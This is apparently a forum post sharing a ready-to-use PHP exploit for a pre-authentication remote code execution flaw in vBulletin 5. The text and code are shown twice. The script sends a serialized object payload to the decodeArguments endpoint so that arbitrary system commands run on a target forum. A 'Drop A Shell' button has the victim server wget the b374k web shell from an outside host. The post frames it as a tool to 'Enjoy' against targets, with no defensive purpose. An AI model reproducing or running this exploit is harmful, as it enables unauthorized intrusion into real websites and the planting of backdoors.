Pranaam to all _/\_
this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz)
script is developed by someone else
just type target forum link and in command box type whatever command you want to execute,
syntax is system('your_command');
like ls
so type system('ls');
if you want to execute whoami command type system('whoami');
Enjoy
source code is
//////////code starts
<?php
/*
Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman
*/
if (isset($_POST['target'])) {
$host = $_POST['target'];
$path = '/ajax/api/hook/decodeArguments?arguments=';
class vB_Database {
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'assert';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
if(isset($_POST['command'])) {
$command = $_POST['command'];
} else if (isset($_POST['shell'])) {
$command = 'system(wget http://b374k.webshell-archive.org/b374k.txt)';
} else {
echo 'Choose One Option';
}
//echo $command."<br>";
$this->db = new vB_Database();
$this->recordset = $command;
}
}
$payload = urlencode(serialize(new vB_dB_Result()));
echo $url = $host.$path.$payload;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec ($curl);
curl_close ($curl);
print $result;
} else {
echo '<body bgcolor="black">
<div align="center">
<form action="" method="POST">
<font color="green">
<h1>VBulletin 5.x.x PreAuth Remote Code Execution Exploit</h1>
Enter Your Hostname example(http://www.vulnerablesite.com/vbulletin/)<br><br>
<input type=text name=target value="target.com"><br><brs>
<h2>Execute A Command</h2>
Enter Your command <input type="text" name="command"><br /><br />
<input type="submit">
<h2>Drop A Shell</h2>
<input type="submit" value="Shell" name="shell">
</font>
</form>
</div>
</body>';
}
?>
//////code ends here
this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz)
script is developed by someone else
just type target forum link and in command box type whatever command you want to execute,
syntax is system('your_command');
like ls
so type system('ls');
if you want to execute whoami command type system('whoami');
Enjoy
source code is
//////////code starts
<?php
/*
Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman
*/
if (isset($_POST['target'])) {
$host = $_POST['target'];
$path = '/ajax/api/hook/decodeArguments?arguments=';
class vB_Database {
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'assert';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
if(isset($_POST['command'])) {
$command = $_POST['command'];
} else if (isset($_POST['shell'])) {
$command = 'system(wget http://b374k.webshell-archive.org/b374k.txt)';
} else {
echo 'Choose One Option';
}
//echo $command."<br>";
$this->db = new vB_Database();
$this->recordset = $command;
}
}
$payload = urlencode(serialize(new vB_dB_Result()));
echo $url = $host.$path.$payload;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec ($curl);
curl_close ($curl);
print $result;
} else {
echo '<body bgcolor="black">
<div align="center">
<form action="" method="POST">
<font color="green">
<h1>VBulletin 5.x.x PreAuth Remote Code Execution Exploit</h1>
Enter Your Hostname example(http://www.vulnerablesite.com/vbulletin/)<br><br>
<input type=text name=target value="target.com"><br><brs>
<h2>Execute A Command</h2>
Enter Your command <input type="text" name="command"><br /><br />
<input type="submit">
<h2>Drop A Shell</h2>
<input type="submit" value="Shell" name="shell">
</font>
</form>
</div>
</body>';
}
?>
//////code ends here
0 comments